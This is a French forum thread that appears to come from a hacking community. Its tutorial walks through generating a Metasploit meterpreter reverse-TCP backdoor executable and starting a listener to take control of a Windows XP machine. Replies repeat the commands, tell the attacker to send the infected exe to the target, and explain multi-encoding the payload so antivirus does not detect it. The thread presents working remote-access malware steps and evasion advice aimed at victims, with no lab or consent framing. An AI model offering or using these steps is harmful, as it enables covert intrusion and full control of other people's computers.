Annonce

Réduire
Aucune annonce.

Metasploit Backdoor

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Tutoriel Metasploit Backdoor

    Backdoor avec Metasploit et Meterpreter




    Avertissement: Cette technique ne fonctione que si le PC-Cible est sous Windows XP

    Veillez à ce que Metasploit soit à jour:
    Code:
    msfupdate









    I-Ouvrez le terminal en root










    II-Ensuite taper cette commande :

    Code:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPORT=4444 X > server.exe

    LHOST=192.168.2.12: à remplacer par votre IP.
    LPORT=4444: Vous pouvez changer le port si vous souhaitez.
    server.exe: Vous pouvez changer le nom à votre guise.

    A ce stade vous devriez voir sur votre Bureau un "server.exe".
    Maintenant vous n'avez plus qu'a l'envoyer à votre PC-Cible , vous remarquez que Metasploit à créer un .exe donc uniquement pour un PC-Cible sous Windows.










    III-Maintenant assurez vous que votre PC-cible à bien executer votre server.exe (ou un autre nom si vous l'avez changé) et entreé cette commande :

    Code:
    msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPROT=4444 E
    LHOST=192.168.2.12: à remplacer par l'IP que vous avez renseigné auparavant.
    LPORT=4444: à remplacer par le Port que vous avez renseigné auparavant.

    Metasploit va alors chercher à se connecter au PC-Cible

    Une fois que vous êtes connecterà la cible vous devriez voir quelque chose ressemblant à ceci :

    Code:
    Meterpreter session 1 opened ( VotreIP:VotrePort -> VictimeIP:VictimePort) Date Heure
    Vous êtes désormais connecté au PC-Cible










    IV-Exércer votre contrôle.

    Vous pouvez afficher toutes les commandes avec
    Code:
    help
    Vous avez maintenant un contrôle total sur votre PC-Cible.




    Merci d'avoir lu mon tutoriel.



    Suivre Hackademics: Twitter, Google+, Facebook.

  • #2
    Merci beaucoup pour ce tuto.

    J'avais déjà vu cette technique mais les adresses ip utilisées me chiffonnent.
    Quelle est elle ? Celle de la cible ou de l'attaquant ?

    Commentaire


    • #3
      salut Anonyme77

      pour cette exploit c'est toujours l'ip de l'attaquant qu'il faut renseigner (LHOST), car en théorie tu n'est pas censé connaitre l'ip de la cible, car c'est une intrusion via un exécutable infecté.

      création du backdoor:
      Code:
      msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPORT=4444 X > server.exe
      ensuite tu te met sur écoute (avec ton ip):
      Code:
      msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPROT=4444 E
      et puis il ne reste plus qu'a envoyer l’exécutable infecté a la cible, et d'attendre qu'il l’exécute.

      des l'instant ou la cible exécute le backdoor (.exe), de ton coté, sur la console ou tu t'es mis en écoute, tu verra ca:
      Code:
      Meterpreter session 1 opened ( VotreIP:VotrePort -> VictimeIP:VictimePort) Date Heure
      voila tu es connecté a la cible, tu peux lancer vnc sur le meterpreter pour voir son écran si tu veux , ou faire joujoue avec la console

      cependant le tuto de _47 est explicite

      Commentaire


      • #4
        Pour faire en sorte que le backdoor soit exécuté sans éveiller les soupçons, il est indispensable de rendre FUD ton exécutable avant de l'envoyer, c'est a dire "indétectable" par les Anti-virus.

        Tu peux utiliser msfencode qui s’avère très pratique et efficace

        options du module:
        Code:
        msfencode -h
        pour lister les formats d'encodage:
        Code:
        msfencode -l
        Pour plus de réussite il faut recourir au multi-encodage

        je te laisse un exmemple:


        -e (pour sélectionner et utiliser un encoder)
        R (c'est pour specifier le format d'encodage, [raw] )
        x86/shikata_ga_nai (c'est l'encodeur choisit N°1)
        x86/alpha_upper (N°2)
        x86/shikata_ga_nai (N°3
        x86/countdown (N°4)
        -c ( combien de fois tu souhaite l'encoder)
        -t (format en sortie, pour nous .exe)
        -o (destination)
        Dernière modification par pl3x, 07 juin 2015, 23h21.

        Commentaire

        Chargement...
        X